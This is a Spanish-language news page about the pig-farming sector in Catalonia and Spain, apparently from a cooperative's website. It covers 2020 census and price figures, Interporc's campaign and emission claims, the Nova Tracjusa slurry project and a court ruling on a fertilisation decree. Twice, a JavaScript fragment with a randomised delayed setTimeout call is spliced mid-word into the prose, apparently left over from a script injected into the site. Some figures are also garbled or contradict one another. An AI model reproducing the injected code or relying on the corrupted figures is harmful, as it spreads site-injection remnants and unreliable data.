Presentado el informe anual sobre el sector porcino en Cataluña 2020

En el informe se actualiza la evolución del sector porcino a escalas europea y catalana, se analizan los diferentes factores de producción, así como los rendimientos técnicos y económicos, se estudia también la evolución del consumo y los datos de comercio exterior y finalmente se hace un análisis de la cadena de valor de la carne de cerdo en la fase de producción, la fase de sacrificio/transformación y la fase de distribución y venta.

En 2020 el censo porcino en Cataluña ha sido de 7.840.519 cabezas

El Grupo de Gestión Porcina de la Universidad de Lleida, en colaboración con el Departamento de Acción Climática, Alimentación y Agenda Rural, ha presentado el Informe del sector porcino 2020.

En la fase de producción, durante el año 2020, el censo porcino en Cataluña ha sido de 7.840.519 cabezas, disminuyendo levemente respecto a 2019, con una variación del 0,915%. Del total de censo de 2020, más de la mitad se localiza en Lleida, con un volumen de 4.217.154 cabezas. Seguidamente, Barcelona tiene 2.080.282, Girona contabiliza 958.097 cabezas y Tarragona, más testimonial, 584.986 cabezas.

En 2020, los animales que más movimientos tuvieron en Cataluña fueron los cerdos de engorde, con un 53,53% del total de los movimientos, seguido de los animales de cría con un peso del 22,97%. Respecto al destino de los movimientos de los cerdos en Cataluña, el 46% de los movimientos de los cerdos son hacia mataderos y el 54% son movimientos hacia otras granjas para completar el sistema de producción. Los principales destinos de los cerdos que Cataluña exporta a España son Huesca, con un 66,73% del total de movimientos, y Zaragoza, con un 10,88%. Si se analizan las exportaciones de animales de Cataluña a destinos europeos, en 2020 el principal destino ha sido Italia, con un movimiento total de 22.003 animales, que representa el 89% del total de movimientos de animales de origen catalán hacia Europa.

En 2020 el número de cabezas que sacrificados es superior a 2019, concretamente un 4,2% más. El número de toneladas de canal fue un 6,73% más respecto al año anterior.

El precio de venta de la canal en el matadero ha sido de 138,87€/canal, un 2,50% inferior al 2019. El valor final de una canal de porcino vendida al consumidor fue de 4,823€/kg canal .

Durante el año 2020 y según los datos publicados por el DACC, el precio medio percibido por el ganadero ha sido de 1,323 €/kg. El coste de producir un cerdo de 105 kg vivo ha sido de 122,64 €/cerdo engordado. Los costes han aumentado respecto al año 2019, cuando fueron de 123,71 €/cerdo engordado.

Éste es el informe destacado del último boletín de Novedades Estadísticas que edita semanalmente el DACC con el objetivo de difundir las estadísticas elaboradas por el Departamento que han tenido salida durante la semana y también recoge los documentos de carácter estadístico publicados por otros organismos y/o instituciones nacionales e internacionales.

Fuente: DACC

Observatori-del-Porci-Anual-2020

Suplemento Agro Alimentario

El pasado domingo 28 de noviembre, el diario Segre adjunto con su edición del domingo su interesante suplemento dedicado al sector agrario y ganadero leridano. En esta ocasión, el sector porcino ocupó buena parte de las páginas de este especial, que también contó con la colaboración de GAP Cooperativa.

 

Revista Segre Agro Alimentari Sector Porci GAP Cooperativa_compressed (1)

 

 

GAP Cooperativa continuará defiendo la viabilidad del proyecto Nova Tracjusa, a pesar del anuncio del Govern de su posible paralización

El anuncio de la consejera de acción climática, Teresa Jordà, de aplicar una moratoria de dos años a la construcción de nuevas incineradoras y la ampliación de las ya existentes, que podría afectar al proyecto de Nova Tracjusa, no impedirá que GAP SCCL, impulsora del proyecto, siga defendiendo la puesta en marcha de este proyecto que obtuvo el visto bueno de la Generalitat en marzo de 2021.

 

Diario Segre, 5 de noviembre de 2021 – Raúl Ramírez

Si a Nova Trajucsa defensa del proyecto

La Generalitat plantea un veto a la construcción de nuevas incineradoras

El anuncio realizado por la consejera de Acción Climática, Teresa Jordà, en el pleno del Parlament de ayer miércoles, de aplicar una moratoria a la construcción y ampliación de nuevas incineradoras en Catalunya podría afectar a Nova Tracjusa, aunque este proyecto impulsado por GAP Cooperativa, con el objetivo de gestionar los excedentes de las deyecciones ganaderas para transformarlos en abonos orgánicos, de una manera responsable y sostenible y absolutamente respetuosa con las personas y el medio natural, nada tiene que ver con el funcionamiento de una planta de incineración

Artículo Diario Segre, 4 de noviembre de 2021 – Raul Ramírez

Segre moratoria Nova Tracjusa

Intervención de Eduard Cau en el programa Planta Baja de TV3, que trató la problemática de la gestión de los purines en Cataluña

El presidente de GAP Cooperativa defendió, en el programa Planta Baixa de TV3 emitido el pasado viernes, el proyecto Nova Tracjusa como una manera eficaz, sostenible y respetuosa con el medio ambiente y las personas a la hora de gestionar los excedentes de purines procedentes de las granjas adheridas a la cooperativa.

 Enlace apartado dedicado a la gestión de los purines en Cataluña a partir del minuto 33.18

El sector porcino de capa blanca muestra su liderazgo reconociendo el valor de sus profesionales

  • Con un peso del 9,5% del PIB industrial, genera más de 400.000 empleos estables y de calidad en nuestro país, de los que un 35% está ubicado en el medio rural.
  • El consumo de carne de porcino de capa blanca ha aumentado más de un 7,5% en el año 2020.
  • Interporc ilustra con la nueva marca y campaña sus valores y aportaciones e  incide en los pilares de futuro del sector: apostar por una producción sostenible, convertirse en motor económico y de fomento del medio rural, además de ofrecer un producto saludable y lleno de  sabor.

Interporc, la Organización Interprofesional Agroalimentaria del Porcino de Capa Blanca, emprende campaña y lanza una nueva identidad corporativa que gira en torno a los valores que han llevado al sector porcino español a convertirse en un referente en la “ganadería moderna”, profesionalizada, innovadora, respetuosa con la sensibilidad y las necesidades de los animales y enfocada al respeto al medioambiente. Esta campaña informativa refuerza las cifras positivas de un sector que ha experimentado un continuo crecimiento en los últimos años, convirtiéndose en una actividad estratégica para la economía española. Con una de  18 millones de euros en 2020 representa más del 42,6% de la Producción Final Ganadera y el 16,3% de la Producción Final Agraria, suponiendo actualmente el 9,5% del PIB Industrial.

Los números respaldan el gran potencial del sector que, con 86.547 granjas, 2.630 industrias cárnicas de porcino y más de 4,8 millones de toneladas producidas al año, sitúan a España como el primer productor de la Unión Europea y el cuarto mayor del mundo. Por su parte, el consumo total de carnes y elaborados del porcino durante 2020 creció tanto en volumen (+7,5%) como en valor (+13,8%).

“Dentro de las producciones ganaderas, el sector porcino de capa blanca ocupa el primer lugar en cuánto a importancia económica, volumen de producción y volumen de exportación”, comenta Alberto Herranz, Director de Interporc. “Durante los últimos años el sector ha crecido tanto en producción, como en censos y en número de explotaciones, gracias al empuje de los mercados exteriores”.

La relevancia que ha tomado este sector se debe fundamentalmente a las exportaciones donde España juega un papel preponderante a nivel europeo, convirtiéndose en líder mundial en cuanto a su capacidad de exportación. Según datos de Interporc, el valor de las exportaciones ha alcanzado los 7.600 millones de euros y España se ha posicionado como el segundo mayor exportador mundial de porcino, por detrás de EE.UU. y por delante de países como Alemania, Dinamarca, Canadá, Países Bajos, Brasil o China.

El sector porcino de capa blanca, un referente en generación de empleo

El sector porcino de capa blanca está implantado en más del 40% de los municipios rurales donde genera por encima de los 20.000 empleos estables y de calidad (35%), no solo en industrias, sino también en granjas y empresas auxiliares, ofreciendo oportunidades laborales que evitan la despoblación de miles de pueblos de nuestro país. En concreto seis de cada diez empleos generados por el sector se encuentran en la “España Rural”, es decir, en municipios con menos de 5.000 habitantes.

Con respecto al empleo femenino, 65.000 mujeres trabajan en el sector porcino español. Además, más de 30.000 llevan a cabo su actividad en pequeños municipios como los mencionados, dotando de vida y dinamismo a los pueblos de la “España vaciada”.

Un modelo de producción basado en la sostenibilidad

El sector porcino de capa blanca español apuesta por la sostenibilidad social y ambiental con un decidido respeto hacia el medio ambiente.

Según datos del último informe de Inventario Nacional Gases de Efecto Invernadero, durante el periodo 2005-2020 el sector ha reducido en un 41,2% sus emisiones de Gases de Efecto Invernadero derivadas de los sistemas de gestión de estiércoles de ganado porcino. Solamente en el último año, se ha reducido en más de un 4% sus emisiones GEI por kilo de carne producido, constituyendo el peso del sector porcino sobre el conjunto de las emisiones GEI nacionales solo el 1,9%.

Bienestar animal, una garantía para el consumidor

El sello de certificación “Compromiso Bienestar Certificado” (IAWS), impulsado por Interporc, avala las buenas prácticas llevadas a cabo en materia de bienestar animal, sanidad, bioseguridad, manejo de los animales y trazabilidad en todos los eslabones de la cadena de valor del porcino de capa blanca en España.

Desde su creación, en 2019, Interporc ha certificado 76 granjas, 23 centros de sacrificio y 42 industrias cárnicas. En 2020ha habido un incremento de un 94% en granjas, un 53% de centros de sacrificio y un 121% en industrias respecto a los operadores que estaban certificados al comenzar dicho periodo.

Nueva imagen y nueva campaña del sector: “Saborea lo nuestro”

Con este inspirador eslogan, Interporc ha lanzado su nueva imagen de marca y ha puesto en marcha  una campaña de publicidad en televisión, radio y medios digitales y escritos.

A través de ella traslada los valores y compromisos que hay detrás del sector porcino de capa blanca, además de resaltar su relevancia tanto desde el punto de vista económico como social.

La campaña está grabada en escenarios originales y protagonizada por personas reales representativas de la totalidad de la cadena de valor: ganaderos, personal de las industrias, transportistas o vendedores. Rinde así un homenaje a todos aquellos que hacen posible con su trabajo diario un sabor muy nuestro. La campaña, firmada por RK People, añade una canción, “Sabor, sabor” que está disponible en todos los canales sociales de Interporc y Spotify.

Fuente de información: Interporc

La Generalitat controla ya donde vierten el purín 190 cubas equipas con GPS en Lleida

Son más de la mitad de las que tienen geolocalización en Catalunya. Es obligatorio para transportarlo a más de 10 kilómetros, para asegurar una aplicación correcta en cultivos y evitar vertidos ilegales.

Noticia publicada en el Diari Segre por R. Ramírez el domingo, 26 de septiembre de 2021

Diari Segre-noticia aplicación purines con cisternas equipadas con GPS

El sector porcino reduce en más de un 41% sus emisiones GEI derivadas de la gestión de estiércoles

  • Las emisiones de metano se reducen en un 37,5% y las de óxido nitroso en un 38,02%, según destaca INTERPORC
  • La reducción de emisiones GEI por gestión de estiércoles desde el año 2005 se debe en buena medida al desarrollo de unas pautas de alimentación muy ajustadas para cada animal

En el periodo 2005-2019 el sector porcino de capa blanca español ha reducido un 41,2% sus emisiones de Gases de Efecto Invernadero derivadas de los sistemas de gestión de estiércoles del ganado porcino, según los datos del último Informe de Inventario Nacional Gases de Efecto Invernadero (marzo 2021).

Con motivo de la celebración del Día Mundial del medio Ambiente, INTERPORC destaca el esfuerzo realizado por las granjas de porcino españolas, que en el año 2005 emitían 1 kilotonelada de CO2 por cada 524 toneladas de carne producidas, mientras que en el año 2019 emitieron 1 kilotonelada de CO2 por cada 891toneladas de carne producidas.

Asimismo, por tipos de emisiones derivadas de la gestión de estiércoles, se reducen tanto las de metano -en un 37,5%- como las de óxido nitroso, en un 38,02%.

Es a partir del año 2005 cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la reducción de las emisiones empieza a hacerse muy patente debida, en buena medida, al desarrollo de unas pautas de alimentación muy ajustadas por animal.

En los últimos años el sector ha sustituido progresivamente en la alimentación de los animales, ingredientes ricos en fibra y de baja digestibilidad por cereales, y ha aumentado la cantidad y calidad de proteínas, así como ha incorporado aminoácidos sintéticos y enzimas digestivas, lo que ha favorecido la digestibilidad en la dieta y reduce de forma considerable las emisiones GEI derivadas de las excreciones.

Año tras año, el sector porcino avanza en sus objetivos para alcanzar un impacto climático neutro de cara a 2050. Para lograrlo, no solo cumple con la normativa más exigente del mundo en el respeto al medio ambiente, que es la europea, sino que además trabaja minuciosamente para, entre otras cuestiones: reducir sus emisiones GEI, hacer un uso más eficiente del agua o disminuir el consumo de energía o la generación de plásticos no reutilizables, residuos o desperdicios.

Fuente de información: INTERPORC

Ganan parcialmente el recurso contra el Decreto de fertilización para la limitación de nuevas explotaciones y ampliaciones que apliquen deyecciones en zonas vulnerables

Fuente de información artículo: Unió de Pagesos

Unió de Pagesos celebra que la Sala Contencioso Administrativo del Tribunal Superior de Justicia de Cataluña (TSJC) haya estimado parcialmente el recurso contencioso administrativo interpuesto por el sindicato en octubre del 2019 contra el Decreto 153/2019, de 3 de julio, de gestión de la fertilización del suelo y de las deyecciones ganaderas y de aprobación del programa de actuación en las zonas vulnerables en relación con la contaminación por nitratos procedentes de fuentes agrarias.

El TSJC ha considerado nulo el apartado segundo de la Disposición Transitoria Primera que establecía que si transcurrido un año desde la próxima modificación o la ampliación de las designaciones de zonas vulnerables, el Gobierno no revisaba el programa de actuación en estas zonas, éste seguía vigente sin permitir la implantación de nuevas explotaciones ganaderas ni ampliaciones de capacidad de las existentes que apliquen deyecciones ganaderas en los municipios designados como zonas vulnerables.

En el recurso, el sindicato denunció que consideraba arbitrario que la inacción de la Administración en la revisión o la ampliación del programa de actuación de las zonas vulnerables, después de un año de su vencimiento, comportara más limitaciones a las explotaciones ganaderas que las previstas en el nuevo decreto. Este ya limita en pocos supuestos las posibilidades de ampliación o implantación de nuevas explotaciones que apliquen deyecciones en zona vulnerable. Con respecto a esta cuestión, el TSJC ha considerado que «este régimen, más costoso que el establecido en el propio Decreto, no tiene amparo legal y se encuentra absolutamente inmotivado, más allá de pretender ser justificado, basándose el incumplimiento por parte de la Administración de sus propias obligaciones, por lo que el recurso debe ser estimado en parte, y anularse el apartado 2 de esta disposición transitoria primera. »

El sindicato sigue trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando para incorporar mejoras en la próxima revisión del Decreto y, paralelamente, en la promulgación de un decreto ley para dejar sin efecto determinadas obligaciones en las zonas no vulnerables y ajustarlo estrictamente a las obligaciones europeas en estas materias , además de dejar, al menos hasta el 2028, el logro del resto de objetivos ambientales y de gestión agronómica a las medidas de fomento de la Política Agraria Común (PAC).